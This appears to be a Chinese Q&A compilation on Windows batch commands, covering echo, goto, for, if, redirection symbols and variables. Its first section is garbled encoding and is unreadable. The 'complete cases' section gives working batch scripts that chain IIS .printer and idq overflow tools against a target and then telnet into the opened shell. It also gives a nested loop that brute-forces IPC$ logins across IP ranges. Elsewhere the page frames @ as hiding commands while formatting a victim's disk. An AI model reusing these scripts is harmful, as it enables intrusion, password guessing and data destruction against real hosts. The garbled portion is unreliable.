批處理返回命令

㈠ 鎵瑰勭悊鏂囦歡甯哥敤鍛戒護

鎵瑰勭悊鏂囦歡涓甯哥敤鐨勪竴浜涘懡浠ゅ寘鎷琫cho銆丂銆乧all銆乺em銆乸ause銆乬oto鍜宻et銆俥cho鍛戒護鐢ㄤ簬鎺у埗鍥炴樉錛屽彲浠ユ樉紺烘秷鎮鎴栨樉紺哄綋鍓嶅洖鏄捐劇疆錛屽傦細`@echo off` 鍏抽棴鍥炴樉錛宍echo hello world` 鏄劇ず娑堟伅銆傚湪瀹為檯鎿嶄綔涓錛屽父涓庨噸瀹氬悜絎﹀彿閰嶅悎錛屽俙echo off > message.txt` 灝嗘秷鎮鍐欏叆鏂囦歡銆

鍛戒護`@`涓巈cho off鍔熻兘綾諱技錛屼絾鐢ㄤ簬闅愯棌鍛戒護琛岋紝渚嬪俙@format X: /q/u/autoset`錛岀敤浜庢牸寮忓寲紓佺洏錛屽敖綆`/y`鍙傛暟涓嶅彲鐢錛屼絾`/autoset`鏈夌浉鍚屾晥鏋溿

call鍛戒護鐢ㄤ簬鍦ㄦ壒澶勭悊鏂囦歡涓璋冪敤鍙︿竴涓鎵瑰勭悊錛屼笉緇堟㈠綋鍓嶈剼鏈錛屼緥濡俙call checknew.bat` 鎴 `call checknew.bat %1 %2`錛屽悗鑰呬紶閫掑弬鏁扮粰琚璋冪敤鐨勬壒澶勭悊銆

rem鍛戒護鐢ㄤ簬娉ㄩ噴錛屼笉琚鎵ц岋紝鐢ㄤ簬澧炲姞浠ｇ爜鍙璇繪э紝濡俙@Rem 榪欐槸鎵瑰勭悊鐨勬弿榪癭銆俻ause鍛戒護鏆傚仠紼嬪簭鎵ц岋紝鐢ㄦ埛杈撳叆鍚庣戶緇錛屽俙pause` 鏄劇ず鎻愮ず鍚庢殏鍋溿

start鍛戒護鐢ㄤ簬璋冪敤澶栭儴紼嬪簭錛屽俙start calc.exe`銆傚畠鏀鎸佸悇縐嶅弬鏁幫紝濡俙start calc.exe MIN` 浠ユ渶灝忓寲紿楀彛鍚鍔ㄣ

goto鍛戒護鐢ㄤ簬鍦ㄦ壒澶勭悊鏂囦歡涓璺寵漿鍒版寚瀹氭爣絳撅紝濡俙goto label_name`銆傚畠閰嶅悎if璇鍙ヤ嬌鐢錛屽俙if {%1}=={} goto noparms`錛岀敤浜庢鏌ュ弬鏁版槸鍚︿負絀恆

set鍛戒護鐢ㄤ簬鎿嶄綔鍙橀噺錛屽寘鎷鏄劇ず銆佽劇疆鍜屽垹闄わ紝濡俙set aa=abcd` 璁劇疆鍙橀噺aa鐨勫礆紝`set` 鎴 `set s` 鏄劇ず鍙橀噺錛宍set aa=` 鍒犻櫎鍙橀噺銆

鎵瑰勭悊涓鐨勫彉閲忔槸閫氱敤鐨勶紝鏃犻渶鎸囧畾綾誨瀷錛屽俙set aa=345` 鏃㈠彲浠ョ悊瑙ｄ負鏁板瓧涔熷彲鐞嗚В涓哄瓧絎︿覆銆俿et鍛戒護鍦ㄦ壒澶勭悊涓鎷ユ湁鏇撮珮綰х殑鍔熻兘銆

鎵瑰勭悊錛岄【鍚嶆濅箟灝辨槸榪涜屾壒閲忕殑澶勭悊銆傛壒澶勭悊鏂囦歡鏄鎵╁睍鍚嶄負銆俠at 鎴栥俢md鐨勬枃鏈鏂囦歡錛屽寘鍚涓鏉℃垨澶氭潯鍛戒護錛岀敱DOS鎴朩indows緋葷粺鍐呭祵鐨勫懡浠よВ閲婂櫒鏉ヨВ閲婅繍琛屻

㈡ 請教：批處理命令執行完畢後，如何自行退出

在你的批處理文件的最後一行輸入：exit
就可以自動退出了。

㈢ 什麼是回顯

回顯，就是顯示正在執行的批處理命令及執行的結果等。

常常指程序開發中執行命令的結果，就是返回的顯示，你輸入一個命令，然後給你返回一個值，顯示在屏幕上。

舉例

在執行有些命令的時候，如果不希望顯示返回值，就要消除回顯。比如：在用串口處理通信中，使用AT命令，來檢測Mole與串口是否連通，能否接收AT命令。命令返回：OK (串口通信正常)（無返回，與串口通信未連通）。用 ATE0去除回顯。

批處理

批處理(Batch)，也稱為批處理腳本。顧名思義，批處理就是對某對象進行批量的處理，通常被認為是一種簡化的腳本語言，它應用於DOS和Windows系統中。批處理文件的擴展名為bat。目前比較常見的批處理包含兩類：DOS批處理和PS批處理。

PS批處理是基於微軟的強大的PowerShell的，用來批量處理一些任務的腳本；而DOS批處理則是基於DOS命令的，用來自動地批量地執行DOS命令以實現特定操作的腳本。更復雜的情況，需要使用if、for、goto等命令控製程式的運行過程，如同C、Basic等高級語言一樣。

如果需要實現更復雜的應用，利用外部程式是必要的，這包括系統本身提供的外部命令和第三方提供的工具或者軟體。批處理程序雖然是在命令行環境中運行，但不僅僅能使用命令行軟體，任何當前系統下可運行的程序都可以放在批處理文件中運行。

㈣ bat批處理 使用runas執行某一命令後如何獲得返回值

那我們換一個思路，直接先讓腳本以管理員身份運行。這樣腳本有了許可權後，for裡面的就可以單獨執行sc命令了，不再繼續使用runas進行提權，那麼就可以正常獲得想要的值了。

㈤ java或C#調用命令行批處理命令如何獲得返回值

[Ctrl+A
全部選擇
提示:你可先修改部分代碼，再按運行]
先看看如上的批處理，其中一個命令是mp,其它的參數我們就不說了。2個點
>
1.sql
這個是默認的輸出，也就是內容輸出
2>Nul
這個是錯誤輸出，也就是如果
mp出現了異常，則不會顯示在屏幕上，而是被丟棄到
nul
%errorlevel%
這個是前一個命令執行的返回值，0代表正常
上述邏輯是:
執行一個程序
如果正常，則轉到下一個命令，列印出OK,然後轉到結束
如果異常，則轉到error處理，列印出
ERROR,轉到結束
列印內容是隨意的
我們的java/C#程序可以讀取進程的輸出內容，並判斷是否批處理執行成功來源:
blog.csdn
作者:老紫竹

㈥ 求批處理命令的用法

批處理文件是將一系列命令按一定的順序集合為一個可執行的文本文件，其擴展名為BAT。
1、 REM
REM 是個注釋命令一般是用來給程序加上註解的，該命令後的內容在程序執行的時候將不會被顯示和執行。例：
REM 你現在看到的就是註解，這一句將不會被執行。在以後的例子中解釋的內容都REM 會放在REM後面。請大家注意。

2、 ECHO
ECHO 是一個回顯命令主要參數有OFF和 ON,一般用ECHO message來顯示一個特定的消息 。例：
Echo off
Rem 以上代表關閉回顯即不顯示所執行的命令
Echo 這個就是消息。
Rem 以上代表顯示「這就是消息」這列字元
執行結果：
C:\>ECHO.BAT
這個就是消息。

3、 GOTO
GOTO 即為跳轉的意思。在批處理中允許以「：XXX」來構建一個標號然後用GOTO ：標號直接來執行標號後的命令。例
:LABEL
REM 上面就是名為LABEL的標號。
DIR C:\
DIR D:\
GOTO LABEL
REM 以上程序跳轉標號LABEL處繼續執行。

4、CALL
CALL 命令可以在批處理執行過程中調用另一個批處理，當另一個批處理執行完後再繼續執行原來的批處理。例：
批處理2.BAT內容如下：
ECHO 這就是2的內容
批處理1.BAT內容如下：
ECHO 這是1的內容
CALL 2.BAT
ECHO 1和2的內容全部顯示完成
執行結果如下：
C:\>1.BAT
這是1的內容
這就是2的內容
1和2的內容全部顯示完成

5、PAUSE
PAUSE 停止系統命令的執行並顯示下面的內容。例：
C:\> PAUSE
請按任意鍵繼續 . . .

6、 IF
IF 條件判斷語句，語法格式如下：
IF [NOT] ERRORLEVEL number command
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command
說明：
[NOT] 將返回的結果取反值即「如果沒有」的意思。
ERRORLEVEL 是命令執行完成後返回的退出值
Number 退出值的數字取值范圍0~255。判斷時值的排列順序應該又大到小。返回的值大於或等於指定的值時條件成立。
string1==string2 string1和string2都為字元的數據，英文字元的大小寫將看做不同，這個條件中的等於號必須是2個（絕對相等），條件想等後即執行後面的 command
EXIST filename 為文件或目錄存在的意思。
IF ERRORLEVEL這條語句必須放在某一個命令後面。執行命令後由IF ERRORLEVEL來判斷命令的返回值。
例：
1、 IF [NOT] ERRORLEVEL number command
檢測命令執行完後的返回值做出判斷。
echo off
dir z:
rem 如果退出代碼為1（不成功）就跳至標題1處執行
IF ERRORLEVEL 1 goto 1
rem 如果退出代碼為0（成功）就跳至標題0處執行
IF ERRORLEVEL 0 goto 0
:0
echo 命令執行成功！
Rem 程序執行完畢跳至標題exit處退出
goto exit
:1
echo 命令執行失敗！
Rem 程序執行完畢跳至標題exit處退出
goto exit
:exit
Rem 這里是程序的出口
2、 IF string1==string2 command
檢測當前變數的值做出判斷
ECHO OFF
IF %1==2 goto no
Echo 變數相等！
Goto exit
:no
echo 變數不相等
goto exit
:exit
大家可以這樣看效果 C:\>test.bat 數字

3、 IF [NOT] EXIST filename command
發現特定的文件做出判斷
echo off
IF not EXIST autoexec.bat goto 1
echo 文件存在成功！
goto exit
:1
echo 文件不存在失敗！
goto exit
:exit
這個批處理大家可以放在c盤和d盤分別執行看看效果。
7、 FOR
FOR這個命令比較特殊是一個循環執行命令的命令，同時FOR的循環裡面還可以套用FOR在進行循環。這篇我們介紹基本的用法就不做套用的循環了，後面再來講解套用的循環。在批處理中FOR的命令如下：
FOR [%%c] IN (set) DO [command] [arguments]
在命令行中命令如下：
FOR [%c] IN (set) DO [command] [arguments]
常用參數：
/L 該集表示以增量形式從開始到結束的一個數字序列。因此，(1,1,5) 將產生序列 1 2 3 4 5，(5,-1,1) 將產生序列 (5 4 3 2 1)。
/D 如果集中包含通配符，則指定與目錄名匹配，而不與文件名匹配。

/F 從指定的文件中讀取數據作為變數
eol=c - 指一個行注釋字元的結尾(就一個)
skip=n - 指在文件開始時忽略的行數。
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的默認分隔符集。
tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代的 for 本身。這會導致額外變數名稱的分配。m-n格式為一個范圍。通過 nth 符號指定 mth。如果符號字元串中的最後一個字元星號，那麼額外的變數將在最後一個符號解析之後分配並接受行的保留文本。
usebackq - 指定新語法已在下類情況中使用:在作為命令執行一個後引號的字元串並且一個單引號字元為文字字元串命令並允許在 filenameset中使用雙引號擴起文件名稱。
下面來看一個例子：
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k
會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將每行中的第二個和第三個符號傳遞給 for 程序體；用逗號和/或空格定界符號。請注意，這個 for 程序體的語句引用 %i 來取得第二個符號，引用 %j 來取得第三個符號，引用 %k來取得第三個符號後的所有剩餘符號。對於帶有空格的文件名，您需要用雙引號將文件名括起來。為了用這種方式來使用雙引號，您還需要使用 usebackq 選項，否則，雙引號會被理解成是用作定義某個要分析的字元串的。
%i 專門在 for 語句中得到說明，%j 和 %k 是通過tokens= 選項專門得到說明的。您可以通過 tokens= 一行指定最多 26 個符號，只要不試圖說明一個高於字母 'z' 或'Z' 的變數。請記住，FOR 變數名分大小寫，是通用的；而且，同時不能有 52 個以上都在使用中。
您還可以在相鄰字元串上使用 FOR /F 分析邏輯；方法是，用單引號將括弧之間的 filenameset 括起來。這樣，該字元串會被當作一個文件中的一個單一輸入行。最後，您可以用 FOR /F 命令來分析命令的輸出。方法是，將括弧之間的 filenameset 變成一個反括字元串。該字元串會被當作命令行，傳遞到一個子 CMD.EXE，其輸出會被抓進內存，並被當作文件分析。因此，以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
會枚舉當前環境中的環境變數名稱。
以下列舉一個簡單的例子，他將說明參數/L和沒有參數的區別：
刪除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT
例：
ECHO OFF
FOR /L %%F IN (1,1,5) DO DEL %%F.TXT
或
FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT
以上2條命令執行的結果都是一樣的如下：
C:\>DEL 1.TXT
C:\>DEL 2.TXT
C:\>DEL 3.TXT
C:\>DEL 4.TXT
C:\>DEL 5.TXT

8、 SETLOCAL
開始批處理文件中環境改動的本地化操作。在執行 SETLOCAL 之後
所做的環境改動只限於批處理文件。要還原原先的設置，必須執
行 ENDLOCAL。 達到批處理文件結尾時，對於該批處理文件的每個
尚未執行的 SETLOCAL 命令，都會有一個隱含的 ENDLOCAL 被
執行。例：
@ECHO OFF
SET PATH /*察看環境變數PATH
PAUSE
SETLOCAL
SET PATH=E:\TOOLS /*重新設置環境變數PATH
SET PATH
PAUSE
ENDLOCAL
SET PATH
從上例我們可以看到環境變數PATH第1次被顯示得時候是系統默認路徑。被設置成了E:\TOOLS後顯示為E:\TOOLS但當ENDLOCAL後我們可以看到他又被還原成了系統的默認路徑。但這個設置只在該批處理運行的時候有作用。當批處理運行完成後環境變數PATH將會還原。

9、 SHIFT
SHIFT命令可以讓在命令上的的命令使用超過10個（%0~%9）以上的可替代參數例：
ECHO OFF
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
執行結果如下：
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
以上就是基於WIN2000下的9個批處理命令。

第二部分：特殊的符號與批處理

在命令行下有些符號是不允許使用的但有些符號卻有著特殊的意義。
1、 符號(@)
@在批處理中的意思是關閉當前行的回顯。我們從上面知道用命令echo off可以關掉整個批處理的命令回顯但卻不能不顯示echo off這個命令。現在我們在這個命令前加上@這樣echo off這一命令就被@關閉了回顯從而達到所有命令均不回顯得要求
2、 符號(>)
>的意思是傳遞並覆蓋。他所起的作用是將運行後的回顯結果傳遞到後面的范圍（後面可是文件也可是默認的系統控制台）例：
文件1.txt的文件內容為：
1+1
使用命令c:\>dir *.txt >1.txt
這時候1.txt的內容如下
驅動器 C 中的卷沒有標簽。
卷的序列號是 301A-1508
C:\ 的目錄
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 個文件 18,630,070 位元組
0 個目錄 1,191,542,784 可用位元組
>將命令執行的結�哺橇嗽�嫉奈募�諶蕁?
在傳遞給控制台的時候程序將不會有任何回顯（注意：這里的回顯跟echo off關掉的回顯不是同一概念。Echo off關掉的是輸入命令的回顯，這里的回顯是程序執行中或後的回顯）例：
C:\>dir *.txt >nul
程序將沒有任何顯示也不會產生任何痕跡。
3、 符號(>>)
符號>>的作用與符號>相似，但他們的區別在於>>是傳遞並在文件末尾追加>>也可將回顯傳遞給控制台（用法同上）例：
文件1.txt內同為：
1+1
使用命令c:\>dir *.txt >>1.txt
這時候1.txt的內容如下
1+1
驅動器 C 中的卷沒有標簽。
卷的序列號是 301A-1508
C:\ 的目錄
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 個文件 18,630,070 位元組
0 個目錄 1,191,542,784 可用位元組
>>將命令執行的結果覆加在了原始的文件內容後面。
4、 符號(|)
|是一個管道傳輸命令意思是將上一命令執行的結果傳遞給下一命令去處理。例：
C:\>dir c:\|find "1508"
卷的序列號是 301A-1508
以上命令的意思為查找c:\的所有並發現1508字元串。Find的用法請用 find /?自行查看
在不使用format的自動格式化參數的時候我是這樣來自動格式化碟片的
echo y|fornat a: /s /q /v:system
用過format命令的人都知道format有一個交互對化過程，要使用者輸入y來確定當前的命令是否被執行。在這個命令前加上echo y並用管道傳輸符|將echo執行的結果y傳遞給format從而達到手工輸入y的目的（這條命令有危害性，測試的時候請謹慎）
5、 符號(^)
^ 是對特殊符號 > 、<、 &、的前導字元。在命令中他將以上的3個符號的特殊動能去掉僅僅只吧他們當成符號而不使用他們的特殊意義。例：
c:\>echo test ^> 1.txt
test > 1.txt
從上面可以看出並沒有把test寫入文件1.txt而是將test >1.txt 當字元串顯示了出來。這個符號在遠程構建批處理的時候很有效果。
6、 符號(&)
&符號允許在一行中使用2個以上不同的命令，當第一個命令執行失敗將不影響第2個命令的執行。例：
c:\> dir z:\ &dir y:\ &dir c:\
以上的命令將會連續顯示z: y: c:盤內的內容不理會該盤符是否存在。
7、 符號(&&)
&&符號也是允許在一行中使用2個以上不同的命令，當第一個命令執行失敗後後續的命令將不會再被執行。例：
c:\> dir z:\ &&dir y:\ &&dir c:\
以上的命令將會提示檢查是否存在z:盤如果存在則執行，如果不存在則停止執行所有的後續命令
8、 符號(" ")
" "符號允許在字元串中包含空格。進入一個特殊的目錄可以用如下方法例:
c:\>cd 「Program Files」
c:\>cd progra~1
c:\>cd pro*
以上方法都可以進入Program Files目錄
9、 符號（,）
,符號相當於空格。在某些特殊的情況下可以用,來代替空格使用。例：
c:\>dir,c:\
10、 符號(;)
;符號當命令相同的時候可以將不同的目標用;隔離開來但執行效果不變。如執行過程中發生錯誤則只返回錯誤報告但程序還是會繼續執行。例：
DIR C:\;D:\;E:\F:\
以上的命令相當於
DIR C:\
DIR D:\
DIR E:\
DIR F:\
當然還有些特殊的符號但他們的使用范圍很小我就不再這里一一的說明了。

第三部分：批處理與變數

在批處理中適當的引用變數將會使你所編制的程序應用面更廣。批處理每次能處理的變數從%0~%9共10個。其中%0默認給批處理的文件名使用。除非在使用SHIFT命令後%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一個%0那麼結果如下：
C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
SHIFT.BAT 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
系統是如何區分每個變數的呢，系統區分變數的規則為字元串中間的空格，即只要發現空格就把空格前面的字元當作一個變數而空格後面的字元則作為另一個變數。如果你的變數是一個當中包含空格的長目錄名這時候你需要用上一節特殊符號8中所用的引號將他圈起來。例：
批處理內容為：
ECHO %1
ECHO %2
ECHO %3
輸入命令：
C:\>TEST 「Program Files」 Program Files
Program Files
Program
Files
在一個復雜的批處理中又可能同時使用的變數會超過10個這時候會和系統的規則想沖突那麼這個問題怎麼解決呢？在系統中還有一種變數稱之為環境變數（使用SET命令可以查看當前系統的環境變數）如當前系統目錄是%windir%或%SystemRoot%等。當同時使用的參數超過10個的時候，我們可以把某些在後面的程序中還要調用的變數保存為環境變數。具體用法如 SET A=%1 這樣我們就命名了一個新的環境變數A 在調用變數A的時候要%A%這樣調用，環境變數不受SHIFT命令影響。如果要改變一個環境變數需要重新對其設置才能改變。當然也可以進行變數與變數之間的傳遞來達到目的。下面我們來看一個例子，批處理如下：
ECHO OFF
SET PASS=%1
SHIFT
SET PASS1=%1
SHIFT
ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %PASS% %PASS1% %9
SET PASS=%PASS1% 變數的傳遞
SET PASS1=%9
SHIFT
ECHO %PASS% %PASS1% %9
使用命令：C:\>TEST A B 3 4 5 6 7 8 9 10 K L
A B 3 4 5 6 7 8 9 10 K 注意：這一行顯示了11個變數
A B L 在使用了3次SHIFT之後%9變成了L
B L 變數的傳遞後的結果

第四部分：完整案例

以上就是批處理的一些用法。現在我們把這些用法結合起來詳細的分析一下目前網上發布的一些批處理，看看他們是怎麼運作的。這里我將列舉三個例子來詳細分析，為了保持程序的完整我的注釋會加在/*後面。
例一
這個例子是利用iis5hack.exe對有.printer漏洞的主機進行溢出的批處理。用到的程序有iis5hack.exe和系統自帶的telnet.exe。iis5hack的命令格式為：
iis5hack <目標ip> <目標埠> <目標版本> <溢出連接埠>目標版本為0-9這10個數字分別對應不同語言版本和sp的系統版本，我們編制的批處理使用的命令格式為 <iis.bat 目標ip （開始版本號）>開始版本號可有可無。程序如下。
@echo off /*關閉命令回顯
if "%1%"=="" goto help /*判斷%1是否為空，%1為目標ip
if "%2%"=="1" goto 1 /*判斷%2是否為1，為1則跳轉標志1
if "%2%"=="2" goto 2 /*%2為開始版本號，如果沒有設置則
if "%2%"=="3" goto 3 /*如果存在則從匹配的地方開始執行
if "%2%"=="4" goto 4
if "%2%"=="5" goto 5
if "%2%"=="6" goto 6
if "%2%"=="7" goto 7
if "%2%"=="8" goto 8
if not EXIST iis5hack.exe goto file /*沒有發現iis5hack.exe就執行標志file段內容
ping %1 -n 1 | find "Received = 1" /*ping目標1次，從結果中發現Received = 1
if errorlevel 1 goto error /*如果返回代碼為1則執行error段(代碼1為沒有發現 0為發現並成功執行)
iis5hack %1 80 9 88 | find "good" /*開始溢出目標埠80 系統代碼9 溢出後連接埠88 在執行結果中發現字元串」good」(溢出成功後才會有字元串good)
if not errorlevel 1 goto telnet /*如果沒有錯誤代碼1（溢出成功）就執行telnet段的內容。
echo 操作系統類型 9 失敗! /否則顯示這一句
:8 /*以下代碼內容參照上面
iis5hack %1 80 8 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統類型 8 失敗!
:7
iis5hack %1 80 7 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統類型 7 失敗!
:6
iis5hack %1 80 6 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統類型 6 失敗!
:5
iis5hack %1 80 5 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統類型 5 失敗!
:4
iis5hack %1 80 4 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統類型 4 失敗!
:3
iis5hack %1 80 3 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統類型 3 失敗!
:2
iis5hack %1 80 2 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統類型 2 失敗!
:1
iis5hack %1 80 1 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統類型 1 失敗!
:0
iis5hack %1 80 0 88 | find "good"
if not errorlevel 1 goto telnet
echo 操作系統類型 0 失敗!
goto error
:telnet
telnet %1 88 /*開始連接目標ip的88埠
goto exit /*連接中斷後跳轉exit段
:error /*error段顯示錯誤後的幫助信息
echo 可能網路不能連接或者對方以修補該漏洞!請按照下面的格式手工嘗試一次!
echo iis5hack [目標IP] [WEB埠] [系統類型] [開放埠]
ECHO 中文: 0
ECHO 中文+sp1: 1
ECHO 英文: 2
ECHO 英文+sp1: 3
ECHO 日語: 4
ECHO 日語+sp1: 5
ECHO 韓文: 6
ECHO 韓文+sp1: 7
ECHO 墨西哥語: 8
ECHO 墨西哥語+sp1: 9
goto exit /*跳轉exit段
:file /*file段顯示文件沒有發現的信息
echo 文件iis5hack.exe沒有發現!程序終止運行!
goto exit /*跳轉exit段
:help /*help段顯示本批處理的使用格式幫助
echo 本程序用法如下:
echo iis [目標ip]
echo iis [目標ip] [開始的號碼9-0]
:exit /*exit段為程序出口
這個批處理基本沒有什麼循環只是一路走下來。所以代碼比較長難度不大！
例二
這個例子是用iisidq.exe對有idq漏洞的機器進行溢出的批處理。使用的程序有iisidq.exe和系統自帶的程序telnet.exe。iisidq.exe的用法如下：
運行參數: 操作系統類型 目的地址 web埠 1 溢出監聽埠 <輸入命令1>
其中,如果輸入命令參數沒有輸入,那麼,默認為:"cmd.exe"。
其中操作系統類型類型的代碼范圍是0-14。我們編制的批處理使用的命令格式為 <idq.bat 目標ip>程序如下：
@echo off /*同例一
if not EXIST iisidq.exe goto file /*同例一
if %1 == "" goto error /*同例一
ping %1 -n 1 | find "Received = 1" /*同例一
if errorlevel 1 goto error1 /*同例一
set b=%1 /*創建一個環境變數b,將變數%1的內容傳遞給環境變數b。變數b的內容以後將是目標ip
set a=0 /*創建一個環境變數a並指定環境變數a為0。由於使用整個批處理的循環所以用a來做計數器。
:no /*no段開始
if %a%==0 set d=0 /*如果環境變數a=0則創建環境變數d設定環境變數d=0。
if %a%==1 set d=1 /*環境變數d其實是操作系統類型代碼，用計數器來控制其
if %a%==2 set d=2 /*變動。
if %a%==3 set d=3
if %a%==4 set d=4
if %a%==5 set d=5
if %a%==6 set d=6
if %a%==7 set d=7
if %a%==9 set d=9
if %a%==10 set d=13
if %a%==11 set d=14
goto 0 /*變數傳遞完成後轉到標志0處運行
:1
echo 正在執行第%d%項!與目標%b%不能連接!正在嘗試連接請等候......
:0 /*標志0開始
IISIDQ %d% %b% 80 1 99 |find "good" /*按格式發送溢出命令並在結果中發現字元串good（發送代碼成功才會有字元串good）
if errorlevel 1 goto 1 /*如果沒有good字元串則沒有發送成跳
/*轉標志1處繼續嘗試發送
ping 127.0.0.1 -n 8 >nul /*ping自己8次相當於延時8秒不顯示執
/*行結果
echo 正在執行第%d%項! /*報告正在溢出的操作系統類型
telnet %b% 99 /*連接溢出埠
echo. /*顯示一個空行
if %d%==14 goto error1 /*如果操作系統類型為14則跳轉error1處（循環出口）
if %d%==13 set a=11 /*開始用計數器對操作系統代碼重新附值
if %d%==9 set a=10
if %d%==7 set a=9
if %d%==6 set a=7
if %d%==5 set a=6
if %d%==4 set a=5
if %d%==3 set a=4
if %d%==2 set a=3
if %d%==1 set a=2
if %d%==0 set a=1
goto no /*附值完成跳轉no段執行
:file /*以下都是出錯後的幫助提示
echo IIsidq.exe沒有發現!將該文件和本文件放在同一目錄!
goto exit
:error
echo 錯誤!目標ip不可識別!請使用下面的格式連接!
echo idq [目標IP]
goto exit
:error1
echo 連接沒有成功!可能目標機器已經修補了該漏洞或者網路故障所至!
echo 請按照下面的格式手工嘗試!
echo iisidq [目標類型] [目標IP] [目標埠] [連接方式] [溢出埠]
echo telnet [目標ip] [溢出埠]
:exit /*整個程序的出口
這個批處理採用的整體循環掌握好計數器部分就掌握了這個批處理。
例三
for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f
上面的命令為1條命令。大家可以看出該命令使用了4個FOR來套用的。用法為：C:\>TEST.BAT 218 當輸入218回車後該命令會由第1個for取初始值0為%%a然後繼續取第2個for的初始值0為%%b繼續取第3個for的初始值1為%%c最後一個for是將userpass.txt中的第一段字元作為密碼%%e第二段字元作為用戶名%%f最後執行命令 (這里我把上面的值都帶進去，設密碼為123 用戶名為 abc)
net usr \\218.0.0.1\ipc$ 123 /u:abc
當然上面這個例子可能有些朋友會說太簡單並且太死板不靈活。我把這個例子做了些修改（完整文件見光碟ipc.bat）由興趣的朋友可以自己看看。修改後的程序可以靈活的查找你指定開始到結束或你指定開始到最大ip的范圍。當然功能還可以在加強，至於能加強到什麼地步能不能成為一個新的工具那就是你的事了。
這個的循環動作大了點主要是ip的數字替換麻煩所以沒辦法。這個批處理我就不寫注釋了，大家好好的參考上面的內容你會很快看懂這個批處理的。看懂了得不要說簡單哦！最起碼這是個沒有使用任何第三方工具就能探測並保存弱口令的批處理了！！簡單的改一改殺傷力還是很大的。以上這些批處理全部在win2000和xp下測試通過最大的優點就是只有一個批處理文件並且絕對不會誤報。缺點就是太長！

㈦ 批處理命令都有什麼

1.Echo 命令
打開回顯或關閉請求回顯功能，或顯示消息。如果沒有任何參數，echo 命令將顯示當前回顯設置。
語法
echo [{on|off}] [message]
Sample篅echo off / echo hello world
在實際應用中我們會把這條命令和重定向符號（也稱為管道符號，一般用> >> ^）結合來實現輸入一些命令到特定格式的文件中.這將在以後的例子中體現出來。

2.@ 命令
表示不顯示@後面的命令，在入侵過程中（例如使用批處理來格式化敵人的硬碟）自然不能讓對方看到你使用的命令啦。
Sample：@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 這個命令是不可以使用/y這個參數的，可喜的是微軟留了個autoset這個參數給我們，效果和/y是一樣的。)

3.Goto 命令
指定跳轉到標簽，找到標簽後，程序將處理從下一行開始的命令。
語法：goto label （label是參數，指定所要轉向的批處理程序中的行。）
Sample：
if {%1}=={} goto noparms
if {%2}=={} goto noparms（如果這里的if、%1、%2你不明白的話，先跳過去，後面會有詳細的解釋。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
標簽的名字可以隨便起，但是最好是有意義的字母啦，字母前加個：用來表示這個字母是標簽，goto命令就是根據這個：來尋找下一步跳到到那裡。最好有一些說明這樣你別人看起來才會理解你的意圖啊。

4.Rem 命令
注釋命令，在C語言中相當與/*--------*/,它並不會被執行，只是起一個注釋的作用，便於別人閱讀和你自己日後修改。
Rem Message
Sample：@Rem Here is the description.

5.Pause 命令
運行 Pause 命令時，將顯示下面的消息：
Press any key to continue . . .
Sample：
@echo off
:begin
a:*.* d：\back
echo Please put a new disk into driver A
pause
goto begin
在這個例子中，驅動器 A 中磁碟上的所有文件均復制到d:\back中。顯示的注釋提示您將另一張磁碟放入驅動器 A 時，pause 命令會使程序掛起，以便您更換磁碟，然後按任意鍵繼續處理。

6.Call 命令
從一個批處理程序調用另一個批處理程序，並且不終止父批處理程序。call 命令接受用作調用目標的標簽。如果在腳本或批處理文件外使用 Call，它將不會在命令行起作用。
語法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
參數
[Drive:}[Path] FileName
指定要調用的批處理程序的位置和名稱。filename 參數必須具有 .bat 或 .cmd 擴展名。

7.start 命令
調用外部程序，所有的DOS命令和命令行程序都可以由start命令來調用。
入侵常用參數：
MIN 開始時窗口最小化
SEPARATE 在分開的空間內開始 16 位 Windows 程序
HIGH 在 HIGH 優先順序類別開始應用程序
REALTIME 在 REALTIME 優先順序類別開始應用程序
WAIT 啟動應用程序並等候它結束
parameters 這些為傳送到命令/程序的參數
執行的應用程序是 32-位 GUI 應用程序時，CMD.EXE 不等應用程序終止就返回命令提示。如果在命令腳本內執行，該新行為則不會發生。
8.choice 命令
choice 使用此命令可以讓用戶輸入一個字元，從而運行不同的命令。使用時應該加/c:參數，c:後應寫提示可輸入的字元，之間無空格。它的返回碼為1234……

如: choice /c:dme defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample：
